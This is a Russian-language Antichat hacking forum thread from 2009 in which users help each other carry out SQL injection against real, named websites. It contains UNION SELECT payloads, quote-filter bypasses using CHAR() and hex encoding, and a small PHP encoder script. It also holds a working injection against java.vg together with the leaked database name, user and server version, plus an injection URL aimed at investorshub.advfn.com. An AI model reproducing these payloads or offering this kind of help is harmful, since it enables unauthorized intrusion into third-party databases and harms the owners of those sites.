Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
27.12.2009, 19:54
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178
Репутация:
30
|
|
Union+select+column_name+from+information_schema.c olumns+where+table_name='table'
скорее всего фильтруются кавычки, и на этот случай, специально для нас  разработчики придумали функцию CHAR(), которой необходимо передать ASCII код символа, или несколько ASCII кодов через запятую.
Допустим, запрос SELECT CHAR(117,115,101,114,115) вернет тебе users, кавычки при этом туда вбивать не надо.
PS. А вот тебе скриптик, чтобы автоматом генерить эту комбинацию.
PHP код:
<form action='' method='POST'>
<input type='text' name='ascii' />
<input type='submit' name='gogo' />
</form>
<hr/>
<?php
if($_POST['gogo'] && $_POST['ascii'] != ''){
for($i = 0; $i < strlen($_POST['ascii']); $i++){
$arr[] = substr($_POST['ascii'], $i, 1);
}
$str = 'char(';
foreach($arr as $k=>$v) {
if($k == count($arr) - 1){ $str .= ord($v).')'; break; }
$str .= ord($v).',';
}
echo $str;
}
?>
|
|
|
27.12.2009, 20:01
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Ayowa
скорее всего фильтруются кавычки, и на этот случай, специально для нас разработчики придумали функцию CHAR(), которой необходимо передать ASCII код символа, или несколько ASCII кодов через запятую.
Допустим, запрос SELECT CHAR(117,115,101,114,115) вернет тебе users, кавычки при этом туда вбивать не надо.
PS. А вот тебе скриптик, чтобы автоматом генерить эту комбинацию.
PHP код:
<form action='' method='POST'>
<input type='text' name='ascii' />
<input type='submit' name='gogo' />
</form>
<hr/>
<?php
if($_POST['gogo'] && $_POST['ascii'] != ''){
for($i = 0; $i < strlen($_POST['ascii']); $i++){
$arr[] = substr($_POST['ascii'], $i, 1);
}
$str = 'char(';
foreach($arr as $k=>$v) {
if($k == count($arr) - 1){ $str .= ord($v).')'; break; }
$str .= ord($v).',';
}
echo $str;
}
?>
И вместо всего этого понта-поста достаточно было написать
PHP код:
<?php echo '0x'.bin2hex($_GET['c']);?>
|
|
|
|
27.12.2009, 20:05
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927
Репутация:
0
|
|
Все. разобрался, всем большое спасибо!
|
|
|
|
27.12.2009, 20:37
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
Ну если нет пинга -> трафика -> ICMP пакетов, значит нет ответа от сервера?
Или я не так понял...?
Допустим у firewall ( outpost ) есть режим анонимности, когда он блокирует ICMP трафик, инет же работает))
Ты же не собираешься отправлять пакеты через ICMP туннель)
|
|
|
|
27.12.2009, 21:32
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от shellz[21h]
Допустим у firewall ( outpost ) есть режим анонимности, когда он блокирует ICMP трафик, инет же работает))
Ты же не собираешься отправлять пакеты через ICMP туннель)
я уже разобрался )
---------
Как раскрутить sql-inj в поле для поиска, просто первый раз сталкиваюсь с этой проблемой 
|
|
|
|
27.12.2009, 21:34
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от SeNaP
я уже разобрался )
---------
Как раскрутить sql-inj в поле для поиска, просто первый раз сталкиваюсь с этой проблемой Все зависит от запроса. Ссылку в студию.
|
|
|
|
27.12.2009, 21:47
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
http://java.vg/index.php?id=0&ac=search
|
|
|
|
27.12.2009, 22:27
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
блин кто нит помогите раскрутит http://investorshub.advfn.com/boards/boards_moderated.asp?user=-177571'+order+by+1{
никак не могу составит правильный запрос
|
|
|
|
27.12.2009, 22:55
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Сообщение от SeNaP
http://java.vg/index.php?id=0&ac=search
Вводишь
aaa')/**/Union/**/Select/**/1,2,concat_ws(0x3a,database(),user(),version()),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18#
Код:
javavg games:javavg@localhost:5.0.67-percona-highperf-b7-log
|
|
|
|
27.12.2009, 23:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от YuNi|[c
блин кто нит помогите раскрутит http://investorshub.advfn.com/boards/boards_moderated.asp?user=-177571'+order+by+1{
никак не могу составит правильный запрос
use it:
investorshub.advfn.com/boards/commentary.asp?article=(%53elect+top+1+table_name+ from+information_schema.tables)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для shellz[21h]](/avatars/avatar46780.gif){kind=avatar}
![Отправить сообщение для shellz[21h] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
